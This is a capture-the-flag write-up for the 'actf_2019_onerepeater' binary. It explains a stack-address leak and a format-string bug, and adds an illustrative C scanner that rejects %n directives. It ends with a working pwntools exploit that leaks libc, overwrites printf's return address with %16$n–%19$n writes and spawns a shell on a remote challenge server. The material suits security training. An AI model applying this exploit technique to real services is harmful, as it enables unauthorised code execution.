actf_2019_onerepeater
<h1>Analysis</h1>
<p>The program offers two main operations.</p>
<p><img src="https://pic.imgdb.cn/item/63a6d5c808b683016366d194.png" alt="" /> </p>
<p>The first is a read. There is no overflow here, but it leaks a stack address.</p>
<p><img src="https://pic.imgdb.cn/item/63a6d60508b683016367252f.png" alt="" /> </p>
<p>The second is a format string vulnerability, so the plan is clear: first leak a libc address and compute one_gadget, then overwrite the function's return address to get a shell. Here I use system("/bin/sh") instead of one_gadget.</p>
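<p>As an added illustration from the defender's side (not part of this writeup), the C block below shows the hardened echo pattern, where user data is never the format string, together with a small scanner that rejects input containing any %n-family conversion, the write directive the payload above relies on (e.g. "%16$n"). It assumes only the C standard library.</p>

```c
/* Added example, not code from the original writeup. */
#include <stdio.h>
#include <string.h>

/* Count %n-family conversions in a printf-style string.
 * Handles "%%" as a literal percent and skips the optional flags, width,
 * precision and POSIX positional "m$" parts before the conversion
 * character. The skip is deliberately permissive (any mix of those
 * characters), which is the right bias for a reject-if-present check.
 * Returns the number of write directives found (%n, %hn, %hhn, %ln, ...). */
int count_write_directives(const char *fmt)
{
    int count = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')            /* "%%" is an escaped percent sign */
            continue;
        /* flags, width, precision and positional "digits$" */
        while (*p && strchr("-+ #0123456789*.$", *p))
            p++;
        /* length modifiers: hh, h, l, ll, j, z, t, L, q */
        while (*p && strchr("hlLjztq", *p))
            p++;
        if (*p == 'n')
            count++;
        if (!*p)                  /* string ended inside a directive */
            break;
    }
    return count;
}

/* Hardened pattern: the user-controlled string is an argument to a fixed
 * format, so "%16$n" is copied literally and nothing is interpreted.
 * Returns snprintf's result, i.e. the length of the echoed input. */
int safe_echo(char *dst, size_t dst_len, const char *user_input)
{
    return snprintf(dst, dst_len, "%s", user_input);
}
```

<p>In practice this check complements, rather than replaces, the compiler and libc mitigations: -Wformat-security flags the printf(buf) pattern at build time, and glibc built with -D_FORTIFY_SOURCE=2 aborts when %n appears in a format string stored in writable memory.</p>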
<h1>Exploit</h1>
<pre><code>from pwn import*
# context.log_level = 'debug'
# o = process("./pwn")
o =remote("node4.buuoj.cn", 25919)
o.sendlineafter("3) Exit\n", '1')
buf = int(o.recv(8), 16)
log.info("buf: %x\n", buf)
o.sendline("%2$p")
o.sendlineafter("3) Exit\n", '2')
puts_addr = int(o.recvline()[:-1], 16) - 11
log.info("puts_addr: %x\n", puts_addr)
libc_base = puts_addr - 0x67360
log.info("libc_base: %x\n", libc_base)
system = libc_base + 0x3cd10
bin_sh = libc_base + 0x17b8cf
printf_ret = buf - (0xffffcb40 - 0xffffcb1c)
printf_arg = printf_ret + 8
addr1 = int(hex(system)[-4:], 16)
addr2 = int(hex(system)[-8:-4], 16)
addr3 = int(hex(bin_sh)[-4:], 16)
addr4 = int(hex(bin_sh)[-8:-4], 16)
addr = [addr1, addr2, addr3, addr4]
addr.sort()
log.info("addr1: %x addr2: %x addr3: %x addr4: %x\n", addr1, addr2, addr3, addr4)
payload = p32(printf_ret) + p32(printf_ret+2) + p32(printf_arg) + p32(printf_arg+2)
dic = {addr1:"%16$n", addr2:"%17$n", addr3:"%18$n", addr4:"%19$n"}
payload += "%{}p".format(addr[0] - 16) + dic[addr[0]]
payload += "%{}p".format(addr[1] - addr[0]) + dic[addr[1]]
payload += "%{}p".format(addr[2] - addr[1]) + dic[addr[2]]
payload += "%{}p".format(addr[3] - addr[2]) + dic[addr[3]]
log.info("payload: %s\n", payload)
o.recv()
o.sendline('1')
o.recv()
o.sendline(payload)
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63a6ff1408b6830163ab1c3e.png" alt="" /></p>